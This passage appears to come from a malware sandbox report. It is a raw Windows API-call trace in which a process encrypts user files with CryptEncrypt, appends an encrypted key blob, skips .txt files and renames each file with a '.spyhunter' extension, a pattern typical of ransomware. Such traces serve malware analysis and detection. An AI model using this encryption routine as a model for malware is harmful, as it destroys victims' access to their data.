HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned 118 [0152.902] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".txt") returned 0x0 [0152.902] GetProcessHeap () returned 0x2c0000 [0152.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.902] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebf4*=0x209, lpOverlapped=0x0) returned 1 [0152.903] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdf7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.903] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x209, lpNumberOfBytesWritten=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebf4*=0x209, lpOverlapped=0x0) returned 1 [0152.903] GetProcessHeap () returned 0x2c0000 [0152.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.903] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.903] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x270ec34*, lpNumberOfBytesWritten=0x270ebf4*=0x4, lpOverlapped=0x0) returned 1 [0152.903] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebf4*=0x30, lpOverlapped=0x0) returned 1 [0152.903] CloseHandle (hObject=0xa0) returned 1 [0152.903] GetProcessHeap () returned 0x2c0000 [0152.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.904] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.spyhunter") returned 128 [0152.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.spyhunter")) returned 1 [0152.904] GetProcessHeap () returned 0x2c0000 [0152.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.905] GetProcessHeap () returned 0x2c0000 [0152.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.905] GetProcessHeap () returned 0x2c0000 [0152.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3068 | out: hHeap=0x2c0000) returned 1 [0152.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec38 | out: pbBuffer=0x270ec38) returned 1 [0152.905] GetProcessHeap () returned 0x2c0000 [0152.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.905] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec30*=0x30) returned 1 [0152.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned 118 [0152.906] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".txt") returned 0x0 [0152.906] GetProcessHeap () returned 0x2c0000 [0152.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.906] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebf4*=0x145, lpOverlapped=0x0) returned 1 [0152.907] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffebb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.907] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x145, lpNumberOfBytesWritten=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebf4*=0x145, lpOverlapped=0x0) returned 1 [0152.907] GetProcessHeap () returned 0x2c0000 [0152.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.907] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.907] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x270ec34*, lpNumberOfBytesWritten=0x270ebf4*=0x4, lpOverlapped=0x0) returned 1 [0152.907] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebf4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebf4*=0x30, lpOverlapped=0x0) returned 1 [0152.907] CloseHandle (hObject=0xa0) returned 1 [0152.907] GetProcessHeap () returned 0x2c0000 [0152.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.907] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.spyhunter") returned 128 [0152.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.spyhunter")) returned 1 [0152.908] GetProcessHeap () returned 0x2c0000 [0152.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.909] GetProcessHeap () returned 0x2c0000 [0152.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.909] GetProcessHeap () returned 0x2c0000 [0152.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2cc0 | out: hHeap=0x2c0000) returned 1 [0152.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec30 | out: pbBuffer=0x270ec30) returned 1 [0152.909] GetProcessHeap () returned 0x2c0000 [0152.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec28*=0x30) returned 1 [0152.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 118 [0152.962] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".txt") returned 0x0 [0152.962] GetProcessHeap () returned 0x2c0000 [0152.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.962] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebec*=0xf1d, lpOverlapped=0x0) returned 1 [0153.336] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff0e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.336] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xf1d, lpNumberOfBytesWritten=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebec*=0xf1d, lpOverlapped=0x0) returned 1 [0153.336] GetProcessHeap () returned 0x2c0000 [0153.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0153.336] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.336] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x270ec2c*, lpNumberOfBytesWritten=0x270ebec*=0x4, lpOverlapped=0x0) returned 1 [0153.336] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebec*=0x30, lpOverlapped=0x0) returned 1 [0153.336] CloseHandle (hObject=0xa0) returned 1 [0153.337] GetProcessHeap () returned 0x2c0000 [0153.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.337] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.spyhunter") returned 128 [0153.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.spyhunter")) returned 1 [0153.338] GetProcessHeap () returned 0x2c0000 [0153.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.338] GetProcessHeap () returned 0x2c0000 [0153.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0153.338] GetProcessHeap () returned 0x2c0000 [0153.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2f30 | out: hHeap=0x2c0000) returned 1 [0153.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec30 | out: pbBuffer=0x270ec30) returned 1 [0153.338] GetProcessHeap () returned 0x2c0000 [0153.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0153.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec28*=0x30) returned 1 [0153.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0153.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0153.339] StrStrW (lpFirst="update.mar", lpSrch=".txt") returned 0x0 [0153.339] GetProcessHeap () returned 0x2c0000 [0153.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0153.339] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebec*=0x2800, lpOverlapped=0x0) returned 1 [0153.562] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.562] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebec*=0x2800, lpOverlapped=0x0) returned 1 [0153.563] GetProcessHeap () returned 0x2c0000 [0153.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0153.563] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.563] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x270ec2c*, lpNumberOfBytesWritten=0x270ebec*=0x4, lpOverlapped=0x0) returned 1 [0153.633] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebec*=0x30, lpOverlapped=0x0) returned 1 [0153.633] CloseHandle (hObject=0xa0) returned 1 [0153.633] GetProcessHeap () returned 0x2c0000 [0153.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.633] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.spyhunter") returned 111 [0153.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.spyhunter")) returned 1 [0153.708] GetProcessHeap () returned 0x2c0000 [0153.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.708] GetProcessHeap () returned 0x2c0000 [0153.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0153.709] GetProcessHeap () returned 0x2c0000 [0153.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bbb8 | out: hHeap=0x2c0000) returned 1 [0153.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec28 | out: pbBuffer=0x270ec28) returned 1 [0153.709] GetProcessHeap () returned 0x2c0000 [0153.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0153.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec20*=0x30) returned 1 [0153.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0153.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0153.710] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".txt") returned 0x0 [0153.710] GetProcessHeap () returned 0x2c0000 [0153.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.710] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ebe4*=0x2800, lpOverlapped=0x0) returned 1 [0153.932] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.932] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ebe4*=0x2800, lpOverlapped=0x0) returned 1 [0153.932] GetProcessHeap () returned 0x2c0000 [0153.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.932] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.932] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x270ec24*, lpNumberOfBytesWritten=0x270ebe4*=0x4, lpOverlapped=0x0) returned 1 [0154.116] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebe4*=0x30, lpOverlapped=0x0) returned 1 [0154.116] CloseHandle (hObject=0xa0) returned 1 [0154.116] GetProcessHeap () returned 0x2c0000 [0154.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0154.116] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.spyhunter") returned 147 [0154.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.spyhunter")) returned 1 [0154.117] GetProcessHeap () returned 0x2c0000 [0154.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0154.117] GetProcessHeap () returned 0x2c0000 [0154.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0154.117] GetProcessHeap () returned 0x2c0000 [0154.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3b98 | out: hHeap=0x2c0000) returned 1 [0154.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec28 | out: pbBuffer=0x270ec28) returned 1 [0154.118] GetProcessHeap () returned 0x2c0000 [0154.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0154.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec20*=0x30) returned 1 [0154.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0154.119] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0154.119] StrStrW (lpFirst="_CACHE_001_", lpSrch=".txt") returned 0x0 [0154.119] GetProcessHeap () returned 0x2c0000 [0154.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0154.119] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebe4*=0x2800, lpOverlapped=0x0) returned 1 [0154.965] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.965] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebe4*=0x2800, lpOverlapped=0x0) returned 1 [0154.966] GetProcessHeap () returned 0x2c0000 [0154.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0154.966] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.966] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x270ec24*, lpNumberOfBytesWritten=0x270ebe4*=0x4, lpOverlapped=0x0) returned 1 [0155.109] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebe4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebe4*=0x30, lpOverlapped=0x0) returned 1 [0155.109] CloseHandle (hObject=0xa0) returned 1 [0155.110] GetProcessHeap () returned 0x2c0000 [0155.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.110] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.spyhunter") returned 117 [0155.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.spyhunter" (normalized: 